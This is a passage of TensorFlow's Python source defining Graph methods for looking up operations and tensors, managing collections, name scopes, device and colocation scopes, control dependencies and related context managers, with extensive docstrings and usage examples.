  def get_operations(self):
    """Return the list of operations in the graph.

    You can modify the operations in place, but modifications
    to the list such as inserts/delete have no effect on the
    list of operations known to the graph.

    This method may be called concurrently from multiple threads.

    Returns:
      A list of Operations.
    """
    # After finalization the op table is immutable, so no lock is needed.
    if self._finalized:
      return list(self._nodes_by_id.values())

    with self._lock:
      return list(self._nodes_by_id.values())

  def get_operation_by_name(self, name):
    """Returns the `Operation` with the given `name`.

    This method may be called concurrently from multiple threads.

    Args:
      name: The name of the `Operation` to return.

    Returns:
      The `Operation` with the given `name`.
    Raises:
      TypeError: If `name` is not a string.
      KeyError: If `name` does not correspond to an operation in this graph.
    """

    if not isinstance(name, six.string_types):
      raise TypeError("Operation names are strings (or similar), not %s." %
                      type(name).__name__)
    return self.as_graph_element(name, allow_tensor=False, allow_operation=True)

  def _get_operation_by_name_unsafe(self, name):
    """Returns the `Operation` with the given `name`.

    This is a internal unsafe version of get_operation_by_name. It skips many
    checks and does not have user friendly error messages but runs
    considerably faster. This method may be called concurrently from multiple
    threads.

    Args:
      name: The name of the `Operation` to return.

    Returns:
      The `Operation` with the given `name`.

    Raises:
      KeyError: If `name` does not correspond to an operation in this graph.
    """
    # Skip the lock on a finalized (immutable) graph.
    if self._finalized:
      return self._nodes_by_name[name]

    with self._lock:
      return self._nodes_by_name[name]

  def get_tensor_by_name(self, name):
    """Returns the `Tensor` with the given `name`.

    This method may be called concurrently from multiple threads.

    Args:
      name: The name of the `Tensor` to return.

    Returns:
      The `Tensor` with the given `name`.

    Raises:
      TypeError: If `name` is not a string.
      KeyError: If `name` does not correspond to a tensor in this graph.
    """
    # Names should be strings.
    if not isinstance(name, six.string_types):
      raise TypeError("Tensor names are strings (or similar), not %s." %
                      type(name).__name__)
    return self.as_graph_element(name, allow_tensor=True, allow_operation=False)

  def _get_tensor_by_tf_output(self, tf_output):
    """Returns the `Tensor` representing `tf_output`.

    Note that there is only one such `Tensor`, i.e. multiple calls to this
    function with the same TF_Output value will always return the same
    `Tensor` object.

    Args:
      tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`).

    Returns:
      The `Tensor` that represents `tf_output`.
    """
    op_name = c_api.TF_OperationName(tf_output.oper)
    op = self._get_operation_by_name_unsafe(op_name)
    return op.outputs[tf_output.index]

  def _next_id(self):
    """Id for next Operation instance. Also increments the internal id."""
    self._check_not_finalized()
    with self._lock:
      self._next_id_counter += 1
      return self._next_id_counter

  @property
  def _last_id(self):
    # The id of the most recently created Operation in this graph.
    return self._next_id_counter

  def as_default(self):
    """Returns a context manager that makes this `Graph` the default graph.

    This method should be used if you want to create multiple graphs
    in the same process. For convenience, a global default graph is
    provided, and all ops will be added to this graph if you do not
    create a new graph explicitly. Use this method with the `with` keyword
    to specify that ops created within the scope of a block should be
    added to this graph.

    The default graph is a property of the current thread. If you
    create a new thread, and wish to use the default graph in that
    thread, you must explicitly add a `with g.as_default():` in that
    thread's function.

    The following code examples are equivalent:

    ```python
    # 1. Using Graph.as_default():
    g = tf.Graph()
    with g.as_default():
      c = tf.constant(5.0)
      assert c.graph is g

    # 2. Constructing and making default:
    with tf.Graph().as_default() as g:
      c = tf.constant(5.0)
      assert c.graph is g
    ```

    Returns:
      A context manager for using this graph as the default graph.
    """
    return _default_graph_stack.get_controller(self)

  @property
  def collections(self):
    """Returns the names of the collections known to this graph."""
    return list(self._collections)

  def add_to_collection(self, name, value):
    """Stores `value` in the collection with the given `name`.

    Note that collections are not sets, so it is possible to add a value to
    a collection several times.

    Args:
      name: The key for the collection. The `GraphKeys` class
        contains many standard names for collections.
      value: The value to add to the collection.
    """  # pylint: disable=g-doc-exception
    _assert_collection_is_ok(name)
    self._check_not_finalized()
    with self._lock:
      if name not in self._collections:
        self._collections[name] = [value]
      else:
        self._collections[name].append(value)

  def add_to_collections(self, names, value):
    """Stores `value` in the collections given by `names`.

    Note that collections are not sets, so it is possible to add a value to
    a collection several times. This function makes sure that duplicates in
    `names` are ignored, but it will not check for pre-existing membership of
    `value` in any of the collections in `names`.

    `names` can be any iterable, but if `names` is a string, it is treated as
    a single collection name.

    Args:
      names: The keys for the collections to add to. The `GraphKeys` class
        contains many standard names for collections.
      value: The value to add to the collections.
    """
    # Make sure names are unique, but treat strings as a single collection name
    names = (names,) if isinstance(names, six.string_types) else set(names)
    for name in names:
      self.add_to_collection(name, value)

  def get_collection_ref(self, name):
    """Returns a list of values in the collection with the given `name`.

    If the collection exists, this returns the list itself, which can
    be modified in place to change the collection.  If the collection does
    not exist, it is created as an empty list and the list is returned.

    This is different from `get_collection()` which always returns a copy of
    the collection list if it exists and never creates an empty collection.

    Args:
      name: The key for the collection. For example, the `GraphKeys` class
        contains many standard names for collections.

    Returns:
      The list of values in the collection with the given `name`, or an empty
      list if no value has been added to that collection.
    """  # pylint: disable=g-doc-exception
    _assert_collection_is_ok(name)
    with self._lock:
      coll_list = self._collections.get(name, None)
      if coll_list is None:
        # Create-on-read: callers get a live list they may mutate.
        coll_list = []
        self._collections[name] = coll_list
      return coll_list

  def get_collection(self, name, scope=None):
    """Returns a list of values in the collection with the given `name`.

    This is different from `get_collection_ref()` which always returns the
    actual collection list if it exists in that it returns a new list each
    time it is called.

    Args:
      name: The key for the collection. For example, the `GraphKeys` class
        contains many standard names for collections.
      scope: (Optional.) A string. If supplied, the resulting list is filtered
        to include only items whose `name` attribute matches `scope` using
        `re.match`. Items without a `name` attribute are never returned if a
        scope is supplied. The choice of `re.match` means that a `scope`
        without special tokens filters by prefix.

    Returns:
      The list of values in the collection with the given `name`, or
      an empty list if no value has been added to that collection. The
      list contains the values in the order under which they were
      collected.
    """  # pylint: disable=g-doc-exception
    _assert_collection_is_ok(name)
    with self._lock:
      collection = self._collections.get(name, None)
      if collection is None:
        return []
      if scope is None:
        return list(collection)
      else:
        c = []
        regex = re.compile(scope)
        for item in collection:
          # Items without a `name` attribute are skipped when filtering.
          if hasattr(item, "name") and regex.match(item.name):
            c.append(item)
        return c

  def get_all_collection_keys(self):
    """Returns a list of collections used in this graph."""
    with self._lock:
      return [x for x in self._collections if isinstance(x, six.string_types)]

  def clear_collection(self, name):
    """Clears all values in a collection.

    Args:
      name: The key for the collection. The `GraphKeys` class contains many
        standard names for collections.
    """
    self._check_not_finalized()
    with self._lock:
      if name in self._collections:
        del self._collections[name]

  @tf_contextlib.contextmanager
  def _original_op(self, op):
    """Python 'with' handler to help annotate ops with their originator.

    An op may have an 'original_op' property that indicates the op on which
    it was based. For example a replica op is based on the op that was
    replicated and a gradient op is based on the op that was differentiated.
    All ops created in the scope of this 'with' handler will have
    the given 'op' as their original op.

    Args:
      op: The Operation that all ops created in this scope will have as their
        original op.

    Yields:
      Nothing.
    """
    old_original_op = self._default_original_op
    try:
      self._default_original_op = op
      yield
    finally:
      # Always restore, even if the body raised.
      self._default_original_op = old_original_op

  # pylint: disable=g-doc-return-or-yield,line-too-long
  @tf_contextlib.contextmanager
  def name_scope(self, name):
    r"""Returns a context manager that creates hierarchical names for operations.

    A graph maintains a stack of name scopes. A `with name_scope(...):`
    statement pushes a new name onto the stack for the lifetime of the context.

    The `name` argument will be interpreted as follows:

    * A string (not ending with '/') will create a new name scope, in which
      `name` is appended to the prefix of all operations created in the
      context. If `name` has been used before, it will be made unique by
      calling `self.unique_name(name)`.
    * A scope previously captured from a `with g.name_scope(...) as
      scope:` statement will be treated as an "absolute" name scope, which
      makes it possible to re-enter existing scopes.
    * A value of `None` or the empty string will reset the current name scope
      to the top-level (empty) name scope.
    For example:

    ```python
    with tf.Graph().as_default() as g:
      c = tf.constant(5.0, name="c")
      assert c.op.name == "c"
      c_1 = tf.constant(6.0, name="c")
      assert c_1.op.name == "c_1"

      # Creates a scope called "nested"
      with g.name_scope("nested") as scope:
        nested_c = tf.constant(10.0, name="c")
        assert nested_c.op.name == "nested/c"

        # Creates a nested scope called "inner".
        with g.name_scope("inner"):
          nested_inner_c = tf.constant(20.0, name="c")
          assert nested_inner_c.op.name == "nested/inner/c"

        # Create a nested scope called "inner_1".
        with g.name_scope("inner"):
          nested_inner_1_c = tf.constant(30.0, name="c")
          assert nested_inner_1_c.op.name == "nested/inner_1/c"

          # Treats `scope` as an absolute name scope, and
          # switches to the "nested/" scope.
          with g.name_scope(scope):
            nested_d = tf.constant(40.0, name="d")
            assert nested_d.op.name == "nested/d"

            with g.name_scope(""):
              e = tf.constant(50.0, name="e")
              assert e.op.name == "e"
    ```

    The name of the scope itself can be captured by `with
    g.name_scope(...) as scope:`, which stores the name of the scope
    in the variable `scope`. This value can be used to name an
    operation that represents the overall result of executing the ops
    in a scope. For example:

    ```python
    inputs = tf.constant(...)
    with g.name_scope('my_layer') as scope:
      weights = tf.Variable(..., name="weights")
      biases = tf.Variable(..., name="biases")
      affine = tf.matmul(inputs, weights) + biases
      output = tf.nn.relu(affine, name=scope)
    ```

    NOTE: This constructor validates the given `name`. Valid scope
    names match one of the following regular expressions:

        [A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root)
        [A-Za-z0-9_.\\-/]* (for other scopes)

    Args:
      name: A name for the scope.

    Returns:
      A context manager that installs `name` as a new name scope.

    Raises:
      ValueError: If `name` is not a valid scope name, according to the rules
        above.
    """
    if name:
      if self._name_stack:
        # Scopes created in a nested scope may have initial characters
        # that are illegal as the initial character of an op name
        # (viz. '-', '\', '/', and '_').
        if not _VALID_SCOPE_NAME_REGEX.match(name):
          raise ValueError("'%s' is not a valid scope name" % name)
      else:
        # Scopes created in the root must match the more restrictive
        # op name regex, which constrains the initial character.
        if not _VALID_OP_NAME_REGEX.match(name):
          raise ValueError("'%s' is not a valid scope name" % name)
    try:
      old_stack = self._name_stack
      if not name:
        # Both for name=None and name="" we re-set to empty scope.
        new_stack = None
      elif name[-1] == "/":
        # A trailing '/' marks a previously captured ("absolute") scope.
        new_stack = _name_from_scope_name(name)
      else:
        new_stack = self.unique_name(name)
      self._name_stack = new_stack
      yield "" if new_stack is None else new_stack + "/"
    finally:
      self._name_stack = old_stack
  # pylint: enable=g-doc-return-or-yield,line-too-long

  def unique_name(self, name, mark_as_used=True):
    """Return a unique operation name for `name`.

    Note: You rarely need to call `unique_name()` directly.  Most of
    the time you just need to create `with g.name_scope()` blocks to
    generate structured names.

    `unique_name` is used to generate structured names, separated by
    `"/"`, to help identify operations when debugging a graph.
    Operation names are displayed in error messages reported by the
    TensorFlow runtime, and in various visualization tools such as
    TensorBoard.

    If `mark_as_used` is set to `True`, which is the default, a new
    unique name is created and marked as in use. If it's set to `False`,
    the unique name is returned without actually being marked as used.
    This is useful when the caller simply wants to know what the name
    to be created will be.

    Args:
      name: The name for an operation.
      mark_as_used: Whether to mark this name as being used.

    Returns:
      A string to be passed to `create_op()` that will be used to name
      the operation being created.
    """
    if self._name_stack:
      name = self._name_stack + "/" + name
    i = self._names_in_use.get(name, 0)
    # Increment the number for "name".
    if mark_as_used:
      self._names_in_use[name] = i + 1
    if i > 0:
      base_name = name
      # Make sure the composed name is not already used.
      while name in self._names_in_use:
        name = "%s_%d" % (base_name, i)
        i += 1
      # Mark the composed name as used in case someone wants
      # to call unique_name("name_1").
      if mark_as_used:
        self._names_in_use[name] = 1
    return name

  def get_name_scope(self):
    """Returns the current name scope.

    For example:

    ```python
    with tf.name_scope('scope1'):
      with tf.name_scope('scope2'):
        print(tf.get_default_graph().get_name_scope())
    ```
    would print the string `scope1/scope2`.

    Returns:
      A string representing the current name scope.
    """
    return self._name_stack

  @tf_contextlib.contextmanager
  def colocate_with(self, op, ignore_existing=False):
    """Returns a context manager that specifies an op to colocate with.

    Note: this function is not for public use, only for internal libraries.

    For example:

    ```python
    a = tf.Variable([1.0])
    with g.colocate_with(a):
      b = tf.constant(1.0)
      c = tf.add(a, b)
    ```

    `b` and `c` will always be colocated with `a`, no matter where `a`
    is eventually placed.

    **NOTE** Using a colocation scope resets any existing device constraints.

    If `op` is `None` then `ignore_existing` must be `True` and the new
    scope resets all colocation and device constraints.

    Args:
      op: The op to colocate all created ops with, or `None`.
      ignore_existing: If true, only applies colocation of this op within
        the context, rather than applying all colocation properties
        on the stack.  If `op` is `None`, this value must be `True`.

    Raises:
      ValueError: if op is None but ignore_existing is False.

    Yields:
      A context manager that specifies the op with which to colocate
      newly created ops.
    """
    if op is None and not ignore_existing:
      raise ValueError("Trying to reset colocation (op is None) but "
                       "ignore_existing is not True")

    if op is not None and not isinstance(op, Operation):
      # We always want to colocate with the reference op.
      op = internal_convert_to_tensor_or_indexed_slices(op, as_ref=True).op

    # By default, colocate_with resets the device function stack,
    # since colocate_with is typically used in specific internal
    # library functions where colocation is intended to be "stronger"
    # than device functions.
    #
    # In the future, a caller may specify that device_functions win
    # over colocation, in which case we can add support.
    device_fn_tmp = self._device_function_stack
    self._device_function_stack = []

    if ignore_existing:
      current_stack = self._colocation_stack
      self._colocation_stack = []

    if op is not None:
      self._colocation_stack.append(op)

    try:
      yield
    finally:
      # Restore device function stack
      self._device_function_stack = device_fn_tmp
      if op is not None:
        self._colocation_stack.pop()

      # Reset the colocation stack if requested.
      if ignore_existing:
        self._colocation_stack = current_stack

  @tf_contextlib.contextmanager
  def device(self, device_name_or_function):
    # pylint: disable=line-too-long
    """Returns a context manager that specifies the default device to use.

    The `device_name_or_function` argument may either be a device name
    string, a device function, or None:

    * If it is a device name string, all operations constructed in
      this context will be assigned to the device with that name, unless
      overridden by a nested `device()` context.
    * If it is a function, it will be treated as a function from
      Operation objects to device name strings, and invoked each time
      a new Operation is created. The Operation will be assigned to
      the device with the returned name.
    * If it is None, all `device()` invocations from the enclosing context
      will be ignored.

    For information about the valid syntax of device name strings, see
    the documentation in
    [`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h).

    For example:

    ```python
    with g.device('/device:GPU:0'):
      # All operations constructed in this context will be placed
      # on GPU 0.
      with g.device(None):
        # All operations constructed in this context will have no
        # assigned device.

    # Defines a function from `Operation` to device string.
    def matmul_on_gpu(n):
      if n.type == "MatMul":
        return "/device:GPU:0"
      else:
        return "/cpu:0"

    with g.device(matmul_on_gpu):
      # All operations of type "MatMul" constructed in this context
      # will be placed on GPU 0; all other operations will be placed
      # on CPU 0.
    ```

    **N.B.** The device scope may be overridden by op wrappers or
    other library code. For example, a variable assignment op
    `v.assign()` must be colocated with the `tf.Variable` `v`, and
    incompatible device scopes will be ignored.

    Args:
      device_name_or_function: The device name or function to use in
        the context.

    Yields:
      A context manager that specifies the default device to use for newly
      created ops.
    """
    # pylint: enable=line-too-long
    # A plain device-name string is normalized into a merge function; a
    # callable (or None) is pushed as-is.
    if (device_name_or_function is not None and
        not callable(device_name_or_function)):
      device_function = pydev.merge_device(device_name_or_function)
    else:
      device_function = device_name_or_function

    try:
      self._device_function_stack.append(device_function)
      yield
    finally:
      self._device_function_stack.pop()

  def _apply_device_functions(self, op):
    """Applies the current device function stack to the given operation."""
    # Apply any device functions in reverse order, so that the most recently
    # pushed function has the first chance to apply a device to the op.
    # We apply here because the result can depend on the Operation's
    # signature, which is computed in the Operation constructor.
    for device_function in reversed(self._device_function_stack):
      # A None entry (from `with g.device(None)`) stops the walk, ignoring
      # any device functions pushed by enclosing contexts.
      if device_function is None:
        break
      op._set_device(device_function(op))  # pylint: disable=protected-access

  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def container(self, container_name):
    """Returns a context manager that specifies the resource container to use.

    Stateful operations, such as variables and queues, can maintain their
    states on devices so that they can be shared by multiple processes.
    A resource container is a string name under which these stateful
    operations are tracked. These resources can be released or cleared
    with `tf.Session.reset()`.

    For example:

    ```python
    with g.container('experiment0'):
      # All stateful Operations constructed in this context will be placed
      # in resource container "experiment0".
      v1 = tf.Variable([1.0])
      v2 = tf.Variable([2.0])
      with g.container("experiment1"):
        # All stateful Operations constructed in this context will be
        # placed in resource container "experiment1".
        v3 = tf.Variable([3.0])
        q1 = tf.FIFOQueue(10, tf.float32)
      # All stateful Operations constructed in this context will be
      # be created in the "experiment0".
      v4 = tf.Variable([4.0])
      q1 = tf.FIFOQueue(20, tf.float32)
      with g.container(""):
        # All stateful Operations constructed in this context will be
        # be placed in the default resource container.
        v5 = tf.Variable([5.0])
        q3 = tf.FIFOQueue(30, tf.float32)

    # Resets container "experiment0", after which the state of v1, v2, v4, q1
    # will become undefined (such as uninitialized).
    tf.Session.reset(target, ["experiment0"])
    ```

    Args:
      container_name: container name string.

    Returns:
      A context manager for defining resource containers for stateful ops,
        yields the container name.
""" original_container = self._container try: self._container = self._container_prefix + container_name yield self._container finally: self._container = original_container # pylint: enable=g-doc-return-or-yield class _ControlDependenciesController(object): """Context manager for `control_dependencies()`.""" def __init__(self, graph, control_inputs): """Create a new `_ControlDependenciesController`. A `_ControlDependenciesController` is the context manager for `with tf.control_dependencies()` blocks. These normally nest, as described in the documentation for `control_dependencies()`. The `control_inputs` argument list control dependencies that must be added to the current set of control dependencies. Because of uniquification the set can be empty even if the caller passed a list of ops. The special value `None` indicates that we want to start a new empty set of control dependencies instead of extending the current set. In that case we also clear the current control flow context, which is an additional mechanism to add control dependencies. Args: graph: The graph that this controller is managing. control_inputs: List of ops to use as control inputs in addition to the current control dependencies. None to indicate that the dependencies should be cleared. """ self._graph = graph if control_inputs is None: self._control_inputs = [] self._new_stack = True else: self._control_inputs = control_inputs self._new_stack = False self._seen_nodes = set() self._old_stack = None self._old_control_flow_context = None # pylint: disable=protected-access def __enter__(self): if self._new_stack: # Clear the control_dependencies graph. self._old_stack = self._graph._control_dependencies_stack self._graph._control_dependencies_stack = [] # Clear the control_flow_context too. 
        self._old_control_flow_context = self._graph._get_control_flow_context()
        self._graph._set_control_flow_context(None)
      self._graph._push_control_dependencies_controller(self)

    def __exit__(self, unused_type, unused_value, unused_traceback):
      self._graph._pop_control_dependencies_controller(self)
      if self._new_stack:
        # Restore the stack and control flow context saved in __enter__.
        self._graph._control_dependencies_stack = self._old_stack
        self._graph._set_control_flow_context(self._old_control_flow_context)

    # pylint: enable=protected-access

    @property
    def control_inputs(self):
      return self._control_inputs

    def add_op(self, op):
      # Record an op created under this controller for dominance pruning.
      self._seen_nodes.add(op)

    def op_in_group(self, op):
      return op in self._seen_nodes

  def _push_control_dependencies_controller(self, controller):
    self._control_dependencies_stack.append(controller)

  def _pop_control_dependencies_controller(self, controller):
    # Controllers must be popped in strict LIFO order.
    assert self._control_dependencies_stack[-1] is controller
    self._control_dependencies_stack.pop()

  def _current_control_dependencies(self):
    # Union of control inputs across all active (nested) controllers.
    ret = set()
    for controller in self._control_dependencies_stack:
      for op in controller.control_inputs:
        ret.add(op)
    return ret

  def _control_dependencies_for_inputs(self, input_tensors):
    """For an op that takes `input_tensors` as inputs, compute control inputs.

    The returned control dependencies should yield an execution that
    is equivalent to adding all control inputs in
    self._control_dependencies_stack to a newly created op. However,
    this function attempts to prune the returned control dependencies
    by observing that nodes created within the same `with
    control_dependencies(...):` block may have data dependencies that make
    the explicit approach redundant.

    Args:
      input_tensors: The direct data dependencies for an op to be created.

    Returns:
      A list of control inputs for the op to be created.
    """
    ret = []
    input_ops = set([t.op for t in input_tensors])
    for controller in self._control_dependencies_stack:
      # If any of the input_ops already depends on the inputs from controller,
      # we say that the new op is dominated (by that input), and we therefore
      # do not need to add control dependencies for this controller's inputs.
      dominated = False
      for op in input_ops:
        if controller.op_in_group(op):
          dominated = True
          break
      if not dominated:
        # Don't add a control input if we already have a data dependency on i.
        # NOTE(mrry): We do not currently track transitive data dependencies,
        #   so we may add redundant control inputs.
        ret.extend([c for c in controller.control_inputs if c not in input_ops])
    return ret

  def _record_op_seen_by_control_dependencies(self, op):
    """Record that the given op depends on all registered control dependencies.

    Args:
      op: An Operation.
    """
    for controller in self._control_dependencies_stack:
      controller.add_op(op)

  def control_dependencies(self, control_inputs):
    """Returns a context manager that specifies control dependencies.

    Use with the `with` keyword to specify that all operations constructed
    within the context should have control dependencies on
    `control_inputs`. For example:

    ```python
    with g.control_dependencies([a, b, c]):
      # `d` and `e` will only run after `a`, `b`, and `c` have executed.
      d = ...
      e = ...
    ```

    Multiple calls to `control_dependencies()` can be nested, and in
    that case a new `Operation` will have control dependencies on the union
    of `control_inputs` from all active contexts.

    ```python
    with g.control_dependencies([a, b]):
      # Ops constructed here run after `a` and `b`.
      with g.control_dependencies([c, d]):
        # Ops constructed here run after `a`, `b`, `c`, and `d`.
    ```

    You can pass None to clear the control dependencies:

    ```python
    with g.control_dependencies([a, b]):
      # Ops constructed here run after `a` and `b`.
      with g.control_dependencies(None):
        # Ops constructed here run normally, not waiting for either `a` or `b`.
        with g.control_dependencies([c, d]):
          # Ops constructed here run after `c` and `d`, also not waiting
          # for either `a` or `b`.
    ```

    *N.B.* The control dependencies context applies *only* to ops that
    are constructed within the context. Merely using an op or tensor
    in the context does not add a control dependency. The following
    example illustrates this point:

    ```python
    # WRONG
    def my_func(pred, tensor):
      t = tf.matmul(tensor, tensor)
      with tf.control_dependencies([pred]):
        # The matmul op is created outside the context, so no control
        # dependency will be added.
        return t

    # RIGHT
    def my_func(pred, tensor):
      with tf.control_dependencies([pred]):
        # The matmul op is created in the context, so a control dependency
        # will be added.
        return tf.matmul(tensor, tensor)
    ```

    Args:
      control_inputs: A list of `Operation` or `Tensor` objects which
        must be executed or computed before running the operations
        defined in the context.  Can also be `None` to clear the control
        dependencies.

    Returns:
     A context manager that specifies control dependencies for all
     operations constructed within the context.

    Raises:
      TypeError: If `control_inputs` is not a list of `Operation` or
        `Tensor` objects.
    """
    if control_inputs is None:
      return self._ControlDependenciesController(self, None)
    # First convert the inputs to ops, and deduplicate them.
    # NOTE(mrry): Other than deduplication, we do not currently track direct
    #   or indirect dependencies between control_inputs, which may result in
    #   redundant control inputs.
    control_ops = []
    current = self._current_control_dependencies()
    for c in control_inputs:
      if isinstance(c, IndexedSlices):
        c = c.op
      c = self.as_graph_element(c)
      if isinstance(c, Tensor):
        c = c.op
      elif not isinstance(c, Operation):
        raise TypeError("Control input must be Operation or Tensor: %s" % c)
      # Skip inputs that outer controllers already impose.
      if c not in current:
        control_ops.append(c)
        current.add(c)
    return self._ControlDependenciesController(self, control_ops)

  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def _attr_scope(self, attr_map):
    """EXPERIMENTAL: A context manager for setting attributes on operators.

    This context manager can be used to add additional
    attributes to operators within the scope of the context. For example:

       with ops.Graph().as_default() as g:
         f_1 = Foo()  # No extra attributes
         with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}):
           f_2 = Foo()  # Additional attribute _a=False
           with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}):
             f_3 = Foo()  # Additional attribute _a=False
             with g._attr_scope({"_a": None}):
               f_4 = Foo()  # No additional attributes.

    Args:
      attr_map: A dictionary mapping attr name strings to
        AttrValue protocol buffers or None.

    Returns:
      A context manager that sets the kernel label to be used for one or more
      ops created in that context.

    Raises:
      TypeError: If attr_map is not a dictionary mapping
        strings to AttrValue protobufs.
    """
    if not isinstance(attr_map, dict):
      raise TypeError("attr_map must be a dictionary mapping "
                      "strings to AttrValue protocol buffers")
    # The saved_attrs dictionary stores any currently-set labels that
    # will be overridden by this context manager.
    saved_attrs = {}
    # Install the given attribute
    for name, attr in attr_map.items():
      if not (isinstance(name, six.string_types) and
              (isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or
               callable(attr))):
        raise TypeError("attr_map must be a dictionary mapping "
                        "strings to AttrValue protocol buffers or "
                        "callables that emit AttrValue protocol buffers")
      try:
        saved_attrs[name] = self._attr_scope_map[name]
      except KeyError:
        pass
      # A None value clears the attribute for the scope instead of setting it.
      if attr is None:
        del self._attr_scope_map[name]
      else:
        self._attr_scope_map[name] = attr
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the attributes set for this context, and restore any saved
      # attributes.
      for name, attr in attr_map.items():
        try:
          self._attr_scope_map[name] = saved_attrs[name]
        except KeyError:
          del self._attr_scope_map[name]

  # pylint: enable=g-doc-return-or-yield

  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def _kernel_label_map(self, op_to_kernel_label_map):
    """EXPERIMENTAL: A context manager for setting kernel labels.

    This context manager can be used to select particular
    implementations of kernels within the scope of the context.
    For example:

        with ops.Graph().as_default() as g:
          f_1 = Foo()  # Uses the default registered kernel for the Foo op.
          with g.kernel_label_map({"Foo": "v_2"}):
            f_2 = Foo()  # Uses the registered kernel with label "v_2"
                         # for the Foo op.
            with g.kernel_label_map({"Foo": "v_3"}):
              f_3 = Foo()  # Uses the registered kernel with label "v_3"
                           # for the Foo op.
              with g.kernel_label_map({"Foo": ""}):
                f_4 = Foo()  # Uses the default registered kernel
                             # for the Foo op.

    Args:
      op_to_kernel_label_map: A dictionary mapping op type strings to
        kernel label strings.

    Returns:
      A context manager that sets the kernel label to be used for one or more
      ops created in that context.

    Raises:
      TypeError: If op_to_kernel_label_map is not a dictionary mapping
        strings to strings.
    """
    if not isinstance(op_to_kernel_label_map, dict):
      raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
                      "strings to strings")
    # The saved_labels dictionary stores any currently-set labels that
    # will be overridden by this context manager.
    saved_labels = {}
    # Install the given label
    for op_type, label in op_to_kernel_label_map.items():
      if not (isinstance(op_type, six.string_types) and
              isinstance(label, six.string_types)):
        raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
                        "strings to strings")
      try:
        saved_labels[op_type] = self._op_to_kernel_label_map[op_type]
      except KeyError:
        pass
      self._op_to_kernel_label_map[op_type] = label
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the labels set for this context, and restore any saved labels.
      for op_type, label in op_to_kernel_label_map.items():
        try:
          self._op_to_kernel_label_map[op_type] = saved_labels[op_type]
        except KeyError:
          del self._op_to_kernel_label_map[op_type]

  # pylint: enable=g-doc-return-or-yield

  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def gradient_override_map(self, op_type_map):
    """EXPERIMENTAL: A context manager for overriding gradient functions.

    This context manager can be used to override the gradient function
    that will be used for ops within the scope of the context. For
    example:

    ```python
    @tf.RegisterGradient("CustomSquare")
    def _custom_square_grad(op, grad):
      # ...

    with tf.Graph().as_default() as g:
      c = tf.constant(5.0)
      s_1 = tf.square(c)  # Uses the default gradient for tf.square.
      with g.gradient_override_map({"Square": "CustomSquare"}):
        s_2 = tf.square(c)  # Uses _custom_square_grad to compute the
                            # gradient of s_2.
    ```

    Args:
      op_type_map: A dictionary mapping op type strings to
        alternative op type strings.

    Returns:
      A context manager that sets the alternative op type to be used for one
      or more ops created in that context.

    Raises:
      TypeError: If `op_type_map` is not a dictionary mapping strings to
        strings.
    """
    if not isinstance(op_type_map, dict):
      raise TypeError("op_type_map must be a dictionary mapping "
                      "strings to strings")
    # The saved_mappings dictionary stores any currently-set mappings that
    # will be overridden by this context manager.
    saved_mappings = {}
    # Install the given label
    for op_type, mapped_op_type in op_type_map.items():
      if not (isinstance(op_type, six.string_types) and
              isinstance(mapped_op_type, six.string_types)):
        raise TypeError("op_type_map must be a dictionary mapping "
                        "strings to strings")
      try:
        saved_mappings[op_type] = self._gradient_override_map[op_type]
      except KeyError:
        pass
      self._gradient_override_map[op_type] = mapped_op_type
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the labels set for this context, and restore any saved labels.
      for op_type, mapped_op_type in op_type_map.items():
        try:
          self._gradient_override_map[op_type] = saved_mappings[op_type]
        except KeyError:
          del self._gradient_override_map[op_type]

  # pylint: enable=g-doc-return-or-yield

  def prevent_feeding(self, tensor):
    """Marks the given `tensor` as unfeedable in this graph."""
    self._unfeedable_tensors.add(tensor)

  def is_feedable(self, tensor):
    """Returns `True` if and only if `tensor` is feedable."""
    return tensor not in self._unfeedable_tensors

  def prevent_fetching(self, op):
    """Marks the given `op` as unfetchable in this graph."""
    self._unfetchable_ops.add(op)

  def is_fetchable(self, tensor_or_op):
    """Returns `True` if and only if `tensor_or_op` is fetchable."""
    # A Tensor is fetchable iff its producing Operation is fetchable.
    if isinstance(tensor_or_op, Tensor):
      return tensor_or_op.op not in self._unfetchable_ops
    else:
      return tensor_or_op not in self._unfetchable_ops


# TODO(agarwal): currently device directives in an outer eager scope will not
# apply to inner graph mode code. Fix that.


def device(device_name_or_function):
  """Wrapper for `Graph.device()` using the default graph.

  See @{tf.Graph.device} for more details.

  Args:
    device_name_or_function: The device name or function to use in
      the context.

  Returns:
    A context manager that specifies the default device to use for newly
    created ops.

  Raises:
    RuntimeError: If eager execution is enabled and a function is passed in.
  """
  if context.in_graph_mode():
    return get_default_graph().device(device_name_or_function)
  else:
    # TODO(agarwal): support device functions in EAGER mode.
    if callable(device_name_or_function):
      raise RuntimeError(
          "tf.device does not support functions when eager execution "
          "is enabled.")
    return context.device(device_name_or_function)


def container(container_name):
  """Wrapper for `Graph.container()` using the default graph.

  Args:
    container_name: The container string to use in the context.

  Returns:
    A context manager that specifies the default container to use for newly
    created stateful ops.
  """
  return get_default_graph().container(container_name)


def colocate_with(op, ignore_existing=False):
  # Graph mode delegates to the default graph; eager mode approximates
  # colocation by reusing the op's device (or a no-op context for None).
  if context.in_graph_mode():
    return get_default_graph().colocate_with(op, ignore_existing)
  else:
    if op is not None:
      return device(op.device)
    else:
      return _NullContextmanager()


def control_dependencies(control_inputs):
  """Wrapper for `Graph.control_dependencies()` using the default graph.

  See @{tf.Graph.control_dependencies} for more details.

  Args:
    control_inputs: A list of `Operation` or `Tensor` objects which
      must be executed or computed before running the operations
      defined in the context.  Can also be `None` to clear the control
      dependencies.

  Returns:
   A context manager that specifies control dependencies for all
   operations constructed within the context.
